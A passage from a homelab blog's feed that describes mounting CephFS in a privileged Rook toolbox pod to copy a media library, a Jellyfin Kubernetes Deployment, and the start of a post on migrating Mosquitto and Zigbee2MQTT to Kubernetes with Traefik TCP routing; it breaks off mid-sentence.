<p>I then remembered that there is a <a href="https://rook.io/docs/rook/latest-release/Troubleshooting/ceph-toolbox/">Rook Ceph Toolbox</a>
with all the necessary tools already installed and I decided to try that.
After copying the credentials similar to what I explained above for my desktop
mounts, I got an error:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>bash-5.1$ mount -t ceph :/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca /mnt/rook -o name<span style="color:#f92672">=</span>admin
</span></span><span style="display:flex;"><span>mount: drop permissions failed.
</span></span></code></pre></div><p>I then changed <a href="https://github.com/rook/rook/blob/master/deploy/examples/toolbox.yaml">the Pod&rsquo;s YAML</a>
a bit to run it as root, which gave me an error again, but at least a different one:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#f92672">[</span>root@rook-ceph-tools-584df95dcb-vdwqc /<span style="color:#f92672">]</span><span style="color:#75715e"># mount -t ceph :/volumes/static-pvcs/media/9a1f1581-6749-4146-a2aa-251fe2b58eca /mnt/rook -o name=admin</span>
</span></span><span style="display:flex;"><span>Unable to apply new capability set.
</span></span><span style="display:flex;"><span>modprobe: FATAL: Module ceph not found in directory /lib/modules/5.15.0-131-generic
</span></span><span style="display:flex;"><span>failed to load ceph kernel module <span style="color:#f92672">(</span>1<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>Unable to apply new capability set.
</span></span><span style="display:flex;"><span>unable to determine mon addresses
</span></span></code></pre></div><p>To get rid of the failed attempt to load the Ceph kernel module, I then also
added the <code>/lib/modules</code> directory as a volume to the Pod. This worked and got
rid of the fatal modprobe error, but still left me with the other errors.
So throwing up my hands, I set <code>securityContext.privileged</code>. I&rsquo;m still a bit
surprised that Linux doesn&rsquo;t have a more specific capability that just allows
mounting. Perhaps the ability to run mount is simply so powerful that it ends up
behind <code>CAP_SYS_ADMIN</code> anyway?</p>
<p>The final Deployment I used:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-tools</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-cluster</span> <span style="color:#75715e"># namespace:cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">rook-ceph-tools</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">rook-ceph-tools</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">dnsPolicy</span>: <span style="color:#ae81ff">ClusterFirstWithHostNet</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceAccountName</span>: <span style="color:#ae81ff">rook-ceph-default</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-tools</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/ceph/ceph:v18</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">/bin/bash</span>
</span></span><span style="display:flex;"><span>            - -<span style="color:#ae81ff">c</span>
</span></span><span style="display:flex;"><span>            - |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              CEPH_CONFIG=&#34;/etc/ceph/ceph.conf&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              MON_CONFIG=&#34;/etc/rook/mon-endpoints&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              KEYRING_FILE=&#34;/etc/ceph/keyring&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              write_endpoints() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                endpoints=$(cat ${MON_CONFIG})
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                mon_endpoints=$(echo &#34;${endpoints}&#34;| sed &#39;s/[a-z0-9_-]\+=//g&#39;)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                DATE=$(date)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                echo &#34;$DATE writing mon endpoints to ${CEPH_CONFIG}: ${endpoints}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  cat &lt;&lt;EOF &gt; ${CEPH_CONFIG}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              [global]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              mon_host = ${mon_endpoints}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              [client.admin]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              keyring = ${KEYRING_FILE}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              EOF
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              watch_endpoints() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                real_path=$(realpath ${MON_CONFIG})
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                initial_time=$(stat -c %Z &#34;${real_path}&#34;)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                while true; do
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  real_path=$(realpath ${MON_CONFIG})
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  latest_time=$(stat -c %Z &#34;${real_path}&#34;)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  if [[ &#34;${latest_time}&#34; != &#34;${initial_time}&#34; ]]; then
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                    write_endpoints
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                    initial_time=${latest_time}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  fi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                  sleep 10
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                done
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              ceph_secret=${ROOK_CEPH_SECRET}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              if [[ &#34;$ceph_secret&#34; == &#34;&#34; ]]; then
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">                ceph_secret=$(cat /var/lib/rook-ceph-mon/secret.keyring)
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              fi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              cat &lt;&lt;EOF &gt; ${KEYRING_FILE}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              [${ROOK_CEPH_USERNAME}]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              key = ${ceph_secret}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              EOF
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              write_endpoints
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">              watch_endpoints</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">imagePullPolicy</span>: <span style="color:#ae81ff">IfNotPresent</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tty</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">runAsNonRoot</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">privileged</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ROOK_CEPH_USERNAME</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-mon</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">key</span>: <span style="color:#ae81ff">ceph-username</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/ceph</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-config</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mon-endpoint-volume</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/rook</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-admin-secret</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/lib/rook-ceph-mon</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">modules</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/lib/modules</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-admin-secret</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">secret</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">rook-ceph-mon</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">optional</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#f92672">key</span>: <span style="color:#ae81ff">ceph-secret</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">path</span>: <span style="color:#ae81ff">secret.keyring</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mon-endpoint-volume</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-mon-endpoints</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#f92672">key</span>: <span style="color:#ae81ff">data</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">path</span>: <span style="color:#ae81ff">mon-endpoints</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">emptyDir</span>: {}
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">modules</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">hostPath</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/lib/modules</span> <span style="color:#75715e"># directory location on host</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;node.kubernetes.io/unreachable&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">operator</span>: <span style="color:#e6db74">&#34;Exists&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">effect</span>: <span style="color:#e6db74">&#34;NoExecute&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">tolerationSeconds</span>: <span style="color:#ae81ff">5</span>
</span></span></code></pre></div><p>Anyway, with the <code>privileged</code> option set, I was finally able to mount. Wanting
to use rsync, I installed it with <code>yum install rsync</code> and mounted the baremetal
and Rook CephFS subvolumes.</p>
<p>I used this command to execute the copy operation:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>rsync -av --info<span style="color:#f92672">=</span>progress2 --info<span style="color:#f92672">=</span>name0 /mnt/baremetal/* /mnt/rook/
</span></span></code></pre></div><p>Here is the final output:</p>
<pre tabindex="0"><code>sent 1,748,055,479,314 bytes  received 155,334 bytes  54,890,039.24 bytes/sec
total size is 1,853,006,549,228  speedup is 1.06
</code></pre><p>The operation took a total of 9.5 h.</p>
<h2 id="deploying-jellyfin">Deploying Jellyfin</h2>
<p>Just for completeness&rsquo; sake, here is the Jellyfin Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jellyfin</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">jellyfin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">jellyfin</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1006</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsUser</span>: <span style="color:#ae81ff">1007</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">runAsGroup</span>: <span style="color:#ae81ff">1006</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jellyfin</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">jellyfin/jellyfin:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;/jellyfin/jellyfin&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--datadir&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;{{ .Values.mounts.cacheAndConf }}/data&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--cachedir&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;{{ .Values.mounts.cacheAndConf }}/cache&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;--ffmpeg&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;/usr/lib/jellyfin-ffmpeg/ffmpeg&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cache-and-conf</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.mounts.cacheAndConf }}</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">media</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.mounts.media }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">1000m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1000Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/health&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">jellyfin-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.port }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cache-and-conf</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">jellyfin-config-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">media</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">jellyfin-media</span>
</span></span></code></pre></div><p>The only thing out of the ordinary here is the <code>spec.securityContext</code>.
Its settings ensure that I&rsquo;m getting the right permissions on the files
produced on the media collection subvolume. All files on there have the GID
<code>1006</code>, which is historically my group on the first desktop connected to my
first Homeserver, and it still serves as the shared group for my media
collection, because both Jellyfin and my desktop user need to access the
media files. With this configuration, Jellyfin writes new files with the correct
GID.</p>
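<p>A quick way to double-check that the <code>securityContext</code> does what I want - a
sketch, assuming kubectl points at the right namespace and using a placeholder path
for the media mount:</p>
<pre tabindex="0"><code># the Jellyfin process should report uid=1007 and gid=1006
kubectl exec deploy/jellyfin -- id

# files created by Jellyfin under the media mount should be group-owned by 1006
kubectl exec deploy/jellyfin -- ls -ln /path/to/media
</code></pre>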
<p>Another somewhat interesting point about Jellyfin: it does allow changing the
config and cache directories, as you can see in the <code>containers[0].command</code>, but it
does not allow the same for the media libraries. Those locations are hardcoded.
I had pretty big problems with this back when I migrated from Docker Compose
to Nomad, but sadly that was before I took extensive notes or documented everything
in my internal wiki, so I can&rsquo;t repeat the manual steps I used to migrate
the data location back then. &#x1f614;</p>
<p>And that&rsquo;s it already for this one. As I noted above, I will pretty closely
follow this post with another one looking at Ceph during the large copy operation.</p>
<p>My next migration this coming weekend will be my Nextcloud instance. I&rsquo;ll need
to look at some Helm charts, but at this point I&rsquo;m pretty sure I will just write
my own.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 17: Migrating my IoT Services</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-17-iot/</link>
      <pubDate>Sat, 15 Feb 2025 12:09:12 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-17-iot/</guid>
      <description>Migrating Mosquitto, mqtt2prometheus and zigbee2mqtt</description>
      <content:encoded><![CDATA[<p>Wherein I migrate several IoT services over to Kubernetes.</p>
<p>This is part 17 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>This is going to be a short one. This weekend, I finished the migration of
several IoT-related services to k8s.
<a href="https://mosquitto.org/">Mosquitto</a> is my MQTT broker, handling messages from
several sources. For me, it&rsquo;s only a listener - I do not have any actual home
automations.
Said mosquitto instance is scraped by <a href="https://github.com/hikhvar/mqtt2prometheus">mqtt2prometheus</a>
to get the data my smart plugs and thermometers produce into my Prometheus
instance.
Finally, I also migrated my <a href="https://www.zigbee2mqtt.io/">Zigbee2MQTT</a> instance
over to the k8s cluster. It controls my Zigbee transceiver and sends the data
from my thermometers on to mosquitto.</p>
<p>If you&rsquo;d like some more details on the power plug data gathering setup, have
a look <a href="https://blog.mei-home.net/posts/power-measurement/">here</a>.
The post on my thermometer setup is still on the large pile of blog posts I&rsquo;d
like to write at some point.</p>
<p>This will be a short(er) post, as I only want to talk about a couple of issues
I encountered along the way.</p>
<h2 id="selfmade-helm-chart">Selfmade Helm chart</h2>
<p>I decided to write my own Helm chart for these tools and manage them all in the
same namespace. That just makes the setup a bit simpler, as they don&rsquo;t really need to
talk to many other services - none of the apps needs a database, for example.</p>
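<p>The whole chart is just a handful of files. Roughly, the layout looks like this (the
template file names are illustrative):</p>
<pre tabindex="0"><code>iot/
├── Chart.yaml
├── values.yaml
└── templates/
    ├── mosquitto.yaml
    ├── exporters.yaml
    └── zigbee2mqtt.yaml
</code></pre>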
<p>So what does a Helm chart look like when I write it myself?
The <code>Chart.yaml</code> is kept extremely simple:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v2</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">name</span>: <span style="color:#ae81ff">iot</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">description</span>: <span style="color:#ae81ff">The Homelab IoT services</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">type</span>: <span style="color:#ae81ff">application</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">version</span>: <span style="color:#ae81ff">0.1.0</span>
</span></span></code></pre></div><p>I don&rsquo;t need anything more. I don&rsquo;t even bother to change the Chart&rsquo;s version
when I change things.</p>
<p>The <code>values.yaml</code> file is also pretty sparse. I mostly use it for cases where
I need a value in multiple places:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">iot</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">mosquitto</span>: <span style="color:#e6db74">&#34;1883&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pwr</span>: <span style="color:#e6db74">&#34;9641&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">temp</span>: <span style="color:#e6db74">&#34;9642&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">z2m</span>: <span style="color:#e6db74">&#34;8080&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">mqttHost</span>: <span style="color:#ae81ff">mqtt.example.com</span>
</span></span></code></pre></div><p>And that&rsquo;s it already.</p>
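<p>Deploying it is then a single Helm invocation - a sketch, assuming the chart
directory and the target namespace are both called <code>iot</code>:</p>
<pre tabindex="0"><code>helm upgrade --install iot ./iot --namespace iot --create-namespace
</code></pre>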
<h2 id="mosquitto">Mosquitto</h2>
<p>As I said, I won&rsquo;t detail every single manifest here. But one interesting part
was that MQTT isn&rsquo;t HTTP - it&rsquo;s a pure TCP-based protocol. I&rsquo;m still using
Ingress mechanisms, though, because Traefik does support TCP routes. In k8s, these are
configured with the <a href="https://doc.traefik.io/traefik/routing/providers/kubernetes-crd/#kind-ingressroutetcp">IngressRouteTCP</a> CRD.
With such a router config, some things are not available. E.g. if you don&rsquo;t
configure TLS, you cannot do host-based routing, because a plain TCP connection
simply doesn&rsquo;t tell you which host the client wanted to reach. So when you want to use
unencrypted TCP (or UDP), you have to create a separate Traefik entrypoint with its
own port just for this route.
Here&rsquo;s the route manifest:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRouteTCP</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mosquitto</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;{{ .Values.mqttHost }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;ingress.example.com&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">mqtt</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">match</span>: <span style="color:#ae81ff">HostSNI(`*`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mosquitto</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">1883</span>
</span></span></code></pre></div><p>This connects Traefik&rsquo;s 1883 port to mosquitto&rsquo;s Service. All connections
arriving on the mqtt entrypoint will be forwarded to mosquitto.</p>
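<p>The <code>mqtt</code> entrypoint itself has to be defined in Traefik&rsquo;s static
configuration. A minimal sketch of the relevant bit, with the port chosen to match
MQTT&rsquo;s default:</p>
<pre tabindex="0"><code>entryPoints:
  mqtt:
    address: &#34;:1883&#34;
</code></pre>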
<p>If you do require TLS, Traefik can make use of the <a href="https://de.wikipedia.org/wiki/Server_Name_Indication">Server Name Indication</a>,
via the <code>HostSNI</code> setting. But SNI is an extension to TLS, so not all software
implementing TLS will support it.
When TLS is enabled, you can even run pure TLS connections over the same port
Traefik is using for HTTPS.
An IngressRouteTCP would look like this:</p>
